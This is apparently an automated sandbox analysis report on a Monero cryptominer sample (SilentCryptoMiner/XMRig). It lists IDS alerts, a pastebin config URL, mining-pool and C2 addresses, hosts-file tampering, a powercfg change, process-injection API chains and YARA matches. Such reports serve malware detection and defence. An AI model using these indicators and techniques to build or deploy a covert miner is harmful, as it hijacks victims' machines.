Suricata IDS: 2054247 - Severity 1 - ET MALWARE SilentCryptoMiner Agent Config Inbound : 172.67.19.24:443 -> 192.168.2.6:49701

Connects to a pastebin service (likely for C&C)

Source: unknown

DNS query: name: pastebin.com

Source: global traffic	TCP traffic: 192.168.2.6:49700 -> 54.37.137.114:10343
Source: global traffic	TCP traffic: 192.168.2.6:49703 -> 51.15.58.224:10343

Source: Joe Sandbox View	IP Address: 51.15.58.224 51.15.58.224
Source: Joe Sandbox View	IP Address: 172.67.19.24 172.67.19.24
Source: Joe Sandbox View	IP Address: 172.67.19.24 172.67.19.24
Source: Joe Sandbox View	IP Address: 54.37.137.114 54.37.137.114

Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic

HTTP traffic detected: GET /raw/mJdpKdhr HTTP/1.1Accept: */*Connection: closeHost: pastebin.comUser-Agent: cpp-httplib/0.12.6

Source: global traffic	DNS traffic detected: DNS query: xmr-eu1.nanopool.org
Source: global traffic	DNS traffic detected: DNS query: pastebin.com

Source: hiwA7Blv7C.exe, 00000000.00000002.2133799777.00000282F70D0000.00000004.00000001.00020000.00000000.sdmp, dialer.exe, 0000002F.00000002.3318123219.00000246FAE30000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
Source: lsass.exe, 0000001B.00000002.3330252561.000002D6F0DBD000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000001B.00000000.2136383610.000002D6F0DBD000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000001B.00000002.3325846114.000002D6F0688000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000001B.00000000.2135862561.000002D6F0688000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0B
Source: lsass.exe, 0000001B.00000003.2647035965.000002D6F0D72000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000001B.00000002.3327715364.000002D6F0C47000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000001B.00000000.2136107573.000002D6F0C43000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000001B.00000003.2179014845.000002D6F0D51000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000001B.00000000.2136260768.000002D6F0D51000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000001B.00000002.3329583490.000002D6F0D9A000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG2.crt0
Source: lsass.exe, 0000001B.00000003.2656931212.000002D6F0CC0000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000001B.00000000.2136214678.000002D6F0CC0000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000001B.00000002.3329017237.000002D6F0CE9000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG2.crt0B
Source: lsass.exe, 0000001B.00000000.2136214678.000002D6F0CC0000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG3.crt0
Source: lsass.exe, 0000001B.00000002.3330772432.000002D6F0E0D000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000001B.00000003.2647178461.000002D6F0E0D000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG3.crt0B
Source: lsass.exe, 0000001B.00000002.3330252561.000002D6F0DBD000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000001B.00000000.2136383610.000002D6F0DBD000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000001B.00000002.3325846114.000002D6F0688000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000001B.00000000.2135862561.000002D6F0688000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertTLSRSASHA2562020CA1-1.crt0
Source: hiwA7Blv7C.exe, 00000000.00000002.2133799777.00000282F70D0000.00000004.00000001.00020000.00000000.sdmp, dialer.exe, 0000002F.00000002.3318123219.00000246FAE30000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crt0
Source: hiwA7Blv7C.exe, 00000000.00000002.2133799777.00000282F70D0000.00000004.00000001.00020000.00000000.sdmp, dialer.exe, 0000002F.00000002.3318123219.00000246FAE30000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
Source: hiwA7Blv7C.exe, 00000000.00000002.2133799777.00000282F70D0000.00000004.00000001.00020000.00000000.sdmp, dialer.exe, 0000002F.00000002.3318123219.00000246FAE30000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
Source: dialer.exe, 00000034.00000002.3323630620.000001888D250000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.cloudflare.com/origin_ca.crl
Source: dialer.exe, 00000034.00000002.3323630620.000001888D250000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.cloudflare.com/origin_ca.crl)on
Source: dialer.exe, 00000034.00000002.3323630620.000001888D250000.00000004.00000020.00020000.00000000.sdmp, dialer.exe, 00000034.00000002.3320602236.000001888CCD8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.cloudflare.com/origin_ca.crl0
Source: dialer.exe, 00000034.00000002.3323630620.000001888D250000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.cloudflare.com/origin_ca.crlv
Source: dialer.exe, 0000002F.00000002.3318123219.00000246FAE30000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://crl.globalsign.net/ObjectSign.crl0
Source: dialer.exe, 0000002F.00000002.3318123219.00000246FAE30000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://crl.globalsign.net/Root.crl0
Source: dialer.exe, 0000002F.00000002.3318123219.00000246FAE30000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://crl.globalsign.net/RootSignPartners.crl0
Source: dialer.exe, 0000002F.00000002.3318123219.00000246FAE30000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://crl.globalsign.net/primobject.crl0
Source: hiwA7Blv7C.exe, 00000000.00000002.2133799777.00000282F70D0000.00000004.00000001.00020000.00000000.sdmp, dialer.exe, 0000002F.00000002.3318123219.00000246FAE30000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
Source: lsass.exe, 0000001B.00000002.3330252561.000002D6F0DBD000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000001B.00000000.2136383610.000002D6F0DBD000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000001B.00000002.3325846114.000002D6F0688000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000001B.00000000.2135862561.000002D6F0688000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
Source: lsass.exe, 0000001B.00000003.2656931212.000002D6F0CC0000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000001B.00000000.2136214678.000002D6F0CC0000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000001B.00000002.3329017237.000002D6F0CE9000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG2.crl0
Source: lsass.exe, 0000001B.00000003.2647035965.000002D6F0D72000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000001B.00000002.3327715364.000002D6F0C47000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000001B.00000000.2136107573.000002D6F0C43000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000001B.00000003.2179014845.000002D6F0D51000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000001B.00000000.2136260768.000002D6F0D51000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000001B.00000002.3329583490.000002D6F0D9A000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG2.crl07
Source: lsass.exe, 0000001B.00000002.3330772432.000002D6F0E0D000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000001B.00000003.2647178461.000002D6F0E0D000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG3.crl0
Source: lsass.exe, 0000001B.00000000.2136214678.000002D6F0CC0000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG3.crl07
Source: lsass.exe, 0000001B.00000002.3330252561.000002D6F0DBD000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000001B.00000000.2136383610.000002D6F0DBD000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000001B.00000002.3325846114.000002D6F0688000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000001B.00000000.2135862561.000002D6F0688000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertTLSRSASHA2562020CA1-4.crl0
Source: hiwA7Blv7C.exe, 00000000.00000002.2133799777.00000282F70D0000.00000004.00000001.00020000.00000000.sdmp, dialer.exe, 0000002F.00000002.3318123219.00000246FAE30000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0S
Source: hiwA7Blv7C.exe, 00000000.00000002.2133799777.00000282F70D0000.00000004.00000001.00020000.00000000.sdmp, dialer.exe, 0000002F.00000002.3318123219.00000246FAE30000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
Source: dialer.exe, 0000002F.00000002.3318123219.00000246FAE30000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
Source: lsass.exe, 0000001B.00000000.2136214678.000002D6F0CC0000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/Omniroot2025.crl0
Source: lsass.exe, 0000001B.00000003.2647035965.000002D6F0D72000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000001B.00000002.3327715364.000002D6F0C47000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000001B.00000000.2136107573.000002D6F0C43000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000001B.00000003.2179014845.000002D6F0D51000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000001B.00000000.2136260768.000002D6F0D51000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000001B.00000002.3329583490.000002D6F0D9A000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootG2.crl0
Source: lsass.exe, 0000001B.00000000.2136214678.000002D6F0CC0000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootG3.crl0
Source: lsass.exe, 0000001B.00000002.3330252561.000002D6F0DBD000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000001B.00000000.2136383610.000002D6F0DBD000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000001B.00000002.3325846114.000002D6F0688000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000001B.00000000.2135862561.000002D6F0688000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://crl4.digicert.com/DigiCertTLSRSASHA2562020CA1-4.crl0
Source: hiwA7Blv7C.exe, 00000000.00000002.2133799777.00000282F70D0000.00000004.00000001.00020000.00000000.sdmp, dialer.exe, 0000002F.00000002.3318123219.00000246FAE30000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://crl4.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0
Source: lsass.exe, 0000001B.00000002.3325846114.000002D6F0688000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000001B.00000000.2135862561.000002D6F0688000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en
Source: lsass.exe, 0000001B.00000002.3327715364.000002D6F0C00000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000001B.00000000.2136080217.000002D6F0C00000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab
Source: lsass.exe, 0000001B.00000002.3324859530.000002D6F062F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000001B.00000000.2135759340.000002D6F062F000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://docs.oasis-open.org/ws-sx/ws-securitypolicy/200702
Source: lsass.exe, 0000001B.00000002.3325227158.000002D6F064E000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000001B.00000000.2135784569.000002D6F064E000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://docs.oasis-open.org/ws-sx/ws-trust/200512
Source: lsass.exe, 0000001B.00000002.3324859530.000002D6F062F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000001B.00000000.2135759340.000002D6F062F000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsd
Source: dialer.exe, 00000034.00000002.3323630620.000001888D250000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.cloudflare.com/origin_ca
Source: dialer.exe, 00000034.00000002.3323630620.000001888D250000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.cloudflare.com/origin_ca(E
Source: dialer.exe, 00000034.00000002.3323630620.000001888D250000.00000004.00000020.00020000.00000000.sdmp, dialer.exe, 00000034.00000002.3320602236.000001888CCD8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.cloudflare.com/origin_ca0
Source: hiwA7Blv7C.exe, 00000000.00000002.2133799777.00000282F70D0000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000001B.00000003.2647035965.000002D6F0D72000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000001B.00000002.3327715364.000002D6F0C47000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000001B.00000003.2656931212.000002D6F0CC0000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000001B.00000000.2136107573.000002D6F0C43000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000001B.00000002.3330252561.000002D6F0DBD000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000001B.00000002.3330772432.000002D6F0E0D000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000001B.00000003.2647178461.000002D6F0E0D000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000001B.00000003.2179014845.000002D6F0D51000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000001B.00000000.2136260768.000002D6F0D51000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000001B.00000000.2136214678.000002D6F0CC0000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000001B.00000000.2136383610.000002D6F0DBD000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000001B.00000002.3329583490.000002D6F0D9A000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000001B.00000002.3325846114.000002D6F0688000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000001B.00000000.2135862561.000002D6F0688000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000001B.00000002.3329017237.000002D6F0CE9000.00000004.00000001.00020000.00000000.sdmp, dialer.exe, 0000002F.00000002.3318123219.00000246FAE30000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.com0
Source: lsass.exe, 0000001B.00000000.2136214678.000002D6F0CC0000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.com0:
Source: hiwA7Blv7C.exe, 00000000.00000002.2133799777.00000282F70D0000.00000004.00000001.00020000.00000000.sdmp, dialer.exe, 0000002F.00000002.3318123219.00000246FAE30000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.com0A
Source: hiwA7Blv7C.exe, 00000000.00000002.2133799777.00000282F70D0000.00000004.00000001.00020000.00000000.sdmp, dialer.exe, 0000002F.00000002.3318123219.00000246FAE30000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.com0C
Source: lsass.exe, 0000001B.00000002.3330252561.000002D6F0DBD000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000001B.00000000.2136383610.000002D6F0DBD000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000001B.00000002.3325846114.000002D6F0688000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000001B.00000000.2135862561.000002D6F0688000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.com0I
Source: hiwA7Blv7C.exe, 00000000.00000002.2133799777.00000282F70D0000.00000004.00000001.00020000.00000000.sdmp, dialer.exe, 0000002F.00000002.3318123219.00000246FAE30000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.com0X
Source: lsass.exe, 0000001B.00000000.2136214678.000002D6F0CC0000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000001B.00000000.2135862561.000002D6F0688000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.msocsp.com0
Source: lsass.exe, 0000001B.00000002.3324859530.000002D6F062F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000001B.00000000.2135759340.000002D6F062F000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/09/policy
Source: lsass.exe, 0000001B.00000002.3324859530.000002D6F062F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000001B.00000000.2135759340.000002D6F062F000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust
Source: lsass.exe, 0000001B.00000002.3324859530.000002D6F062F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000001B.00000002.3325227158.000002D6F064E000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000001B.00000000.2135759340.000002D6F062F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000001B.00000000.2135784569.000002D6F064E000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/07/securitypolicy
Source: lsass.exe, 0000001B.00000002.3324859530.000002D6F062F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000001B.00000000.2135759340.000002D6F062F000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/wsdl/
Source: lsass.exe, 0000001B.00000002.3324859530.000002D6F062F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000001B.00000000.2135759340.000002D6F062F000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/wsdl/erties
Source: lsass.exe, 0000001B.00000002.3324859530.000002D6F062F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000001B.00000000.2135759340.000002D6F062F000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/wsdl/soap12/
Source: lsass.exe, 0000001B.00000002.3324859530.000002D6F062F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000001B.00000000.2135759340.000002D6F062F000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/wsdl/soap12/P
Source: hiwA7Blv7C.exe, 00000000.00000002.2133799777.00000282F70D0000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000001B.00000002.3330252561.000002D6F0DBD000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000001B.00000000.2136383610.000002D6F0DBD000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000001B.00000002.3325846114.000002D6F0688000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000001B.00000000.2135862561.000002D6F0688000.00000004.00000001.00020000.00000000.sdmp, dialer.exe, 0000002F.00000002.3318123219.00000246FAE30000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.digicert.com/CPS0
Source: dialer.exe, 00000034.00000002.3320602236.000001888CC96000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://pastebin.com/raw/mJ
Source: dialer.exe, 00000034.00000002.3320602236.000001888CC96000.00000004.00000020.00020000.00000000.sdmp, dialer.exe, 00000034.00000002.3320602236.000001888CC58000.00000004.00000020.00020000.00000000.sdmp, dialer.exe, 00000034.00000002.3320602236.000001888CD3F000.00000004.00000020.00020000.00000000.sdmp, dialer.exe, 00000034.00000003.2171682791.000001888CCB2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://pastebin.com/raw/mJdpKdhr
Source: dialer.exe, 00000034.00000002.3323630620.000001888D250000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://pastebin.com/raw/mJdpKdhr&
Source: dialer.exe, 00000034.00000002.3320602236.000001888CC96000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://pastebin.com/raw/mJdpKdhr--cinit-stealth-targets=Taskmgr.exe
Source: dialer.exe, 00000034.00000002.3320602236.000001888CD3F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://pastebin.com/raw/mJdpKdhr4wO
Source: dialer.exe, 00000034.00000003.2171682791.000001888CCB2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://pastebin.com/raw/mJdpKdhrTaskmgr.exe
Source: dialer.exe, 00000034.00000002.3320602236.000001888CC96000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://pastebin.com/raw/mJdpKdhrbdoyd.
Source: dialer.exe, 00000034.00000002.3320602236.000001888CC96000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://pastebin.com/raw/mJnit-
Source: dialer.exe, 0000002F.00000002.3318123219.00000246FAE30000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://xmrig.com/docs/algorithms

Source: unknown	Network traffic detected: HTTP traffic on port 49701 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49701

Spam, unwanted Advertisements and Ransom Demands

Modifies the hosts file

Source: C:\Users\user\Desktop\hiwA7Blv7C.exe

File written: C:\Windows\System32\drivers\etc\hosts

Jump to behavior

System Summary

Malicious sample detected (through community Yara rule)

Source: 47.2.dialer.exe.246fae5cc20.0.raw.unpack, type: UNPACKEDPE	Matched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
Source: 47.2.dialer.exe.246fae5cc20.0.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
Source: 47.2.dialer.exe.246fae5cc20.0.raw.unpack, type: UNPACKEDPE	Matched rule: Detects coinmining malware Author: ditekSHen
Source: 47.2.dialer.exe.246fae38c60.2.raw.unpack, type: UNPACKEDPE	Matched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
Source: 47.2.dialer.exe.246fae38c60.2.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
Source: 47.2.dialer.exe.246fae38c60.2.raw.unpack, type: UNPACKEDPE	Matched rule: Detects coinmining malware Author: ditekSHen
Source: 47.2.dialer.exe.246fae35400.1.raw.unpack, type: UNPACKEDPE	Matched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
Source: 47.2.dialer.exe.246fae35400.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
Source: 47.2.dialer.exe.246fae35400.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects coinmining malware Author: ditekSHen
Source: 0000002F.00000002.3318123219.00000246FAE30000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY	Matched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
Source: Process Memory Space: dialer.exe PID: 1060, type: MEMORYSTR	Matched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
Source: C:\Windows\Temp\bzqlyietdwsj.tmp, type: DROPPED	Matched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
Source: C:\Windows\Temp\bzqlyietdwsj.tmp, type: DROPPED	Matched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
Source: C:\Windows\Temp\bzqlyietdwsj.tmp, type: DROPPED	Matched rule: Detects coinmining malware Author: ditekSHen

Uses powercfg.exe to modify the power settings

Source: C:\Windows\System32\cmd.exe

Process created: C:\Windows\System32\powercfg.exe powercfg /x -hibernate-timeout-ac 0

Source: C:\Windows\System32\dialer.exe	Code function: 14_2_00007FF68D3D10C0 OpenProcess,OpenProcess,K32GetModuleFileNameExW,PathFindFileNameW,lstrlenW,StrCpyW,CloseHandle,StrCmpIW,NtQueryInformationProcess,OpenProcessToken,GetTokenInformation,GetLastError,LocalAlloc,GetTokenInformation,GetSidSubAuthorityCount,GetSidSubAuthority,LocalFree,CloseHandle,StrStrA,VirtualAllocEx,WriteProcessMemory,NtCreateThreadEx,WaitForSingleObject,GetExitCodeThread,CloseHandle,CloseHandle,	14_2_00007FF68D3D10C0
Source: C:\Windows\System32\winlogon.exe	Code function: 23_2_000002D0165E28C8 NtEnumerateValueKey,NtEnumerateValueKey,	23_2_000002D0165E28C8
Source: C:\Windows\System32\lsass.exe	Code function: 27_2_000002D6F151253C NtQueryDirectoryFileEx,GetFileType,StrCpyW,	27_2_000002D6F151253C
Source: C:\Windows\System32\lsass.exe	Code function: 27_2_000002D6F151202C NtQuerySystemInformation,StrCmpNIW,	27_2_000002D6F151202C
Source: C:\Windows\System32\dwm.exe	Code function: 31_2_000001D15B0828C8 NtEnumerateValueKey,NtEnumerateValueKey,	31_2_000001D15B0828C8
Source: C:\Windows\System32\dialer.exe	Code function: 42_2_00007FF6429510C0 OpenProcess,OpenProcess,K32GetModuleFileNameExW,PathFindFileNameW,lstrlenW,StrCpyW,CloseHandle,StrCmpIW,NtQueryInformationProcess,OpenProcessToken,GetTokenInformation,GetLastError,LocalAlloc,GetTokenInformation,GetSidSubAuthorityCount,GetSidSubAuthority,LocalFree,CloseHandle,StrStrA,VirtualAllocEx,WriteProcessMemory,NtCreateThreadEx,WaitForSingleObject,GetExitCodeThread,CloseHandle,CloseHandle,	42_2_00007FF6429510C0
Source: C:\Windows\System32\dialer.exe	Code function: 47_2_00007FF75E942F50 NtOpenKey,	47_2_00007FF75E942F50
Source: C:\Windows\System32\svchost.exe	Code function: 54_2_00000200A19B202C NtQuerySystemInformation,StrCmpNIW,	54_2_00000200A19B202C

Source: C:\Program Files\Google\Chrome\updater.exe

File created: C:\Windows\TEMP\libtqlibdoyd.sys

Jump to behavior

Source: C:\Program Files\Google\Chrome\updater.exe

File deleted: C:\Windows\Temp\bzqlyietdwsj.tmp

Jump to behavior

Source: C:\Windows\System32\dialer.exe	Code function: 14_2_00007FF68D3D14D8	14_2_00007FF68D3D14D8
Source: C:\Windows\System32\dialer.exe	Code function: 14_2_00007FF68D3D226C	14_2_00007FF68D3D226C
Source: C:\Windows\System32\dialer.exe	Code function: 14_2_00007FF68D3D2560	14_2_00007FF68D3D2560
Source: C:\Windows\System32\winlogon.exe	Code function: 23_2_000002D016581F2C	23_2_000002D016581F2C
Source: C:\Windows\System32\winlogon.exe	Code function: 23_2_000002D0165938A8	23_2_000002D0165938A8
Source: C:\Windows\System32\winlogon.exe	Code function: 23_2_000002D01658D0E0	23_2_000002D01658D0E0
Source: C:\Windows\System32\winlogon.exe	Code function: 23_2_000002D0165E2B2C	23_2_000002D0165E2B2C
Source: C:\Windows\System32\winlogon.exe	Code function: 23_2_000002D0165F44A8	23_2_000002D0165F44A8
Source: C:\Windows\System32\winlogon.exe	Code function: 23_2_000002D0165EDCE0	23_2_000002D0165EDCE0
Source: C:\Windows\System32\winlogon.exe	Code function: 23_2_000002D016611F2C	23_2_000002D016611F2C
Source: C:\Windows\System32\winlogon.exe	Code function: 23_2_000002D0166238A8	23_2_000002D0166238A8
Source: C:\Windows\System32\winlogon.exe	Code function: 23_2_000002D01661D0E0	23_2_000002D01661D0E0
Source: C:\Windows\System32\lsass.exe	Code function: 27_2_000002D6F14ED0E0	27_2_000002D6F14ED0E0
Source: C:\Windows\System32\lsass.exe	Code function: 27_2_000002D6F14F38A8	27_2_000002D6F14F38A8
Source: C:\Windows\System32\lsass.exe	Code function: 27_2_000002D6F14E1F2C	27_2_000002D6F14E1F2C
Source: C:\Windows\System32\lsass.exe	Code function: 27_2_000002D6F151DCE0	27_2_000002D6F151DCE0
Source: C:\Windows\System32\lsass.exe	Code function: 27_2_000002D6F15244A8	27_2_000002D6F15244A8
Source: C:\Windows\System32\lsass.exe	Code function: 27_2_000002D6F1512B2C	27_2_000002D6F1512B2C
Source: C:\Windows\System32\lsass.exe	Code function: 27_2_000002D6F157DCE0	27_2_000002D6F157DCE0
Source: C:\Windows\System32\lsass.exe	Code function: 27_2_000002D6F15844A8	27_2_000002D6F15844A8
Source: C:\Windows\System32\lsass.exe	Code function: 27_2_000002D6F1572B2C	27_2_000002D6F1572B2C
